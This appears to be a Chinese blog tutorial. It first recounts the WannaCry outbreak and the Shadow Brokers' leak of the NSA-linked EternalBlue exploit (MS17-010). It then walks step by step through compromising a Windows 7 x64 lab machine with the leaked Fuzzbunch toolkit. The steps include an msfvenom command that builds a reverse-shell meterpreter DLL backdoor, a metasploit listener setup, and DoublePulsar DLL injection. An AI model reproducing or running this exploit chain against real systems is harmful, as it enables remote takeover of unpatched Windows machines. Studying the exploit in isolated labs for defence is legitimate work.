我估摸着这两天大家都应该被一款老旧的勒索病毒刷爆了朋友圈,可能还有些同学不幸中招,那么是什么原因导致了这款勒索病毒如此猖狂?
这件事情还得从一个黑客组织说起,这个组织叫做Equation Group(方程式组织),这一黑客团伙与美国国家安全局(NSA)的关系一直十分密切。而且外界也普遍认为,Equation Group是美国国家安全局的一个下属部门。很多安全研究专家表示,Equation Group这一黑客组织所拥有的技术无论是从复杂程度还是从其先进程度来看,都已经超越了目前绝大多数的黑客团体,而且该黑客组织已经活跃了二十多年了。
然而,这个黑客组织被另一黑客团伙“The Shadow Brokers”(影子经纪人)给入侵了……(就是这么任性)。“The Shadow Brokers”(影子经纪人)自称他们从Equation Group手里拿到了很大一部分黑客工具,决定公开叫卖。
本以为能狠赚一笔,但实际上却没有人鸟他们,就是这么神奇。于是The Shadow Brokers决定公开一部分有价值的工具,其中“eternalblue”(永恒之蓝)就是其中之一(漏洞编号ms17-010)。那么永恒之蓝这个漏洞利用程序究竟牛X到什么地步呢?这么说吧,除了windows 10以外,windows系列的系统无一能够幸免。
于是乎,永恒之蓝漏洞利用程序+wannacry勒索软件程序造就了迄今为止最巨大的勒索交费活动,影响到近百个国家上千家企业及公共组织。
接下来,满足小白的好奇心,一起探究The Shadow Brokers公布的永恒之蓝漏洞利用程序,如何利用ms17-010攻陷一台64位windows 7。
探究环境:
攻击机1(192.168.1.101):
装有metasploit的linux
攻击机2(192.168.1.137):
可以运行The Shadow Brokers工具箱的windows xp->python2.6+ PyWin32 v2.12
靶机(192.168.1.140):
windows 7 x64(开放139、445端口)
探究目的:
利用The Shadow Brokers工具箱中的永恒之蓝利用程序攻陷靶机
探究过程:
1.在攻击机2上打开The Shadow Brokers工具箱,进入C:\shadowbroker-master\windows(以放在C盘根目录为例)
2.修改windows文件夹下的Fuzzbunch.xml文件,用我们本地系统相关路径把其中的第19行和第24行路径进行覆盖
修改后的路径与目录当前的路径一致
3. 用编辑器把fb.py源码的第72行“Listening post”相关部分注释掉
4.在cmd下运行fb.py
5.设置要攻击的参数
一路回车,直到输入项目名称处,输入项目名称
继续回车
6.使用“永恒之蓝”攻击:use Eternalblue,并设置相关参数
继续一路回车,直到选择模式选择1
继续一路回车,直至攻击完成
7.在攻击机1上使用metasploit生成dll后门,并设置木马回弹监听
相关命令:
msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 lhost=192.168.1.101 lport=4444 -f dll -o ./backdoor.dll
8.进入msf控制台 msfconsole,设置监听dll木马
设置监听
相关命令:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 本机地址
exploit
9.将生产的dll复制到xp上
10.使用doublepulsar传入dll木马,并执行
一路回车,直到选择系统架构,由于我们要攻击的主机是win 7 x64位,故这里选择1
选择2 dll注入
11.回到metasploit,dll木马已经成功回弹,输入meterpreter命令测试,完成探究。
